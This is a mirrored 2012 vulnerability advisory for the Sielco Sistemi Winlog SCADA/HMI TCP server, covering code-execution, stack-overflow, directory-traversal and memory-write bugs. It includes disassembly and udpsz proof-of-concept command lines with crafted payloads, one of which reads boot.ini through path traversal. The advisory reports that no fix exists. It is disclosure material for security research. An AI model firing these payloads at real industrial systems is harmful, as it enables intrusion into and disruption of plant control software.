扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 |
####################################################################### Luigi Auriemma Application:Sielco Sistemi Winlog http://www.sielcosistemi.com/en/products/winlog_scada_hmi/ Versions: <= 2.07.16 Platforms:Windows Bugs: A] DbiGetRecordCount code execution B] @Db@TDataSet@Close$qqrv code execution C] DbiSetToRecordNo code execution D] _TCPIPS_BinOpenFileFP stack overflow E] Directory traversal F] write4 G] write1 Exploitation: remote Date: 26 Jun 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web:aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "Simple, flexible and economical, Winlog Pro is a SCADA/HMI software package for the supervision of industrial and civil plants." ####################################################################### ======= 2) Bugs ======= This software can act as a TCP/IP server by enabling the specific "Run TCP/IP server" option available in the "Configuration->Options->TCP/IP" section of the project we want to run and Runtime.exe will listen on the TCP port 46824. The part of the server running on this port uses a static buffer of 0x119 bytes to handle the incoming data so all the vulnerabilities explained below can be exploited using these fixed addresses. Then the exception handler used by the server allows to perform many attempts without altering the normal work of the program. ----------------------------------- A] DbiGetRecordCount code execution ----------------------------------- DbfIntf.DbiGetRecordCount: 0038354B 8B10 MOV EDX,DWORD PTR DS:[EAX] 0038354D FF92 F4000000CALL DWORD PTR DS:[EDX+F4] ----------------------------------------- B] @Db@TDataSet@Close$qqrv code execution ----------------------------------------- Vcldb40.@Db@TDataSet@Close$qqrv: 46012BEE 8B08 MOV ECX,DWORD PTR DS:[EAX] 46012BF0 FF91 20010000CALL DWORD PTR DS:[ECX+120] ---------------------------------- C] DbiSetToRecordNo code execution ---------------------------------- DbfIntf.DbiSetToRecordNo: 00382BEB 8B10 MOV EDX,DWORD PTR DS:[EAX] 00382BED FF92 F4000000CALL DWORD PTR DS:[EDX+F4] --------------------------------------- D] _TCPIPS_BinOpenFileFP stack overflow --------------------------------------- 004134F6/. 55PUSH EBP 004134F7|. 8BECMOV EBP,ESP 004134F9|. 81C4 FCFEFFFF ADD ESP,-104 ... 00413525|> FF75 08 PUSH DWORD PTR SS:[EBP+8]; /Arg4 00413528|. 8B15 E8085B00 MOV EDX,DWORD PTR DS:[5B08E8]; | 0041352E|. 8D8D FCFEFFFF LEA ECX,DWORD PTR SS:[EBP-104] ; | 00413534|. 81C2 E0020000 ADD EDX,2E0; | 0041353A|. 52PUSH EDX ; |Arg3 0041353B|. 68 FC245600 PUSH Runtime.005624FC; |Arg2 = 005624FC ASCII "%s\%s" 00413540|. 51PUSH ECX ; |Arg1 00413541|. E8 B6BD1300 CALL Runtime.0054F2FC; \RunTime.0054F2FC sprintf() ---------------------- E] Directory traversal ---------------------- Through opcode 0x78 is possible to open any file on the disk where it's running the server and with 0x96/0x97/0x98 is possible to read its content. --------- F] write4 --------- The opcodes used for the file operations specify a 32bit number that is the element of the array returned by the server while opening the file and so it can be used to load a file pointer outside the array (stream lock table PUSH DWORD PTR DS:[EBX*4+5B0024]) and maybe reaching EnterCriticalSection with an arbitrary value: EnterCriticalSection: 7C81A1C1 F0:0FB301LOCK BTR DWORD PTR DS:[ECX],EAX ; LOCK prefix Anyway exploiting a similar bug is very theoretical because it's hard to bypass all the obstacles for using the own 32bit value with EnterCriticalSection. --------- G] write1 --------- The lack of checks on the return value of the realloc function used by the software allows to put a 0x00 byte outside the existent buffer if the specified size to reallocate is negative or unallocable: Vcl40.@System@@LStrSetLength$qqrv: 40004F42 E8 E1DCFFFFCALL Vcl40.@System@@ReallocMem$qqrv 40004F47 58 POP EAX 40004F48 83C0 08ADD EAX,8 40004F4B 8903 MOV DWORD PTR DS:[EBX],EAX 40004F4D 8970 FCMOV DWORD PTR DS:[EAX-4],ESI 40004F50 C60430 00MOV BYTE PTR DS:[EAX+ESI],0 ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip A] udpsz -b a -T -C 15 0x14 -C "e6563600 e6563600" 0x15 SERVER 46824 0x119 B] udpsz -b a -T -C 17 0x14 -C "e6563600 ea563600 ce553600" 0x15 SERVER 46824 0x119 C] udpsz -b a -T -C 1e 0x14 -C "11111111 e6563600" 0x15 SERVER 46824 0x119 -C 28 -C 32 -C 3c D] udpsz -b a -T -C 78 0x14 SERVER 46824 0x119 E] udpsz -D -4 -T -C 78 0x14 -c "../../../../../../../../../../boot.ini\0" 0x15 SERVER 46824 0x119 udpsz -D -4 -T -C 98 0x14 -C "00 00 00 00" 0x19 SERVER 46824 0x119 F] udpsz -b 0x40 -T SERVER 46824 0xfffff udpsz -T -C 7b 0x14 -b 0x7f -C "c1c13800" 0x15 SERVER 46824 0x119 note that the above PoC does NOTHING, it's just a note G] udpsz -T -C 15 0x14 -C "e6563600 7a553600 f2563600 88888888" 0x15 SERVER 46824 0x119 ####################################################################### ====== 4) Fix ====== No fix. |
体验盒子
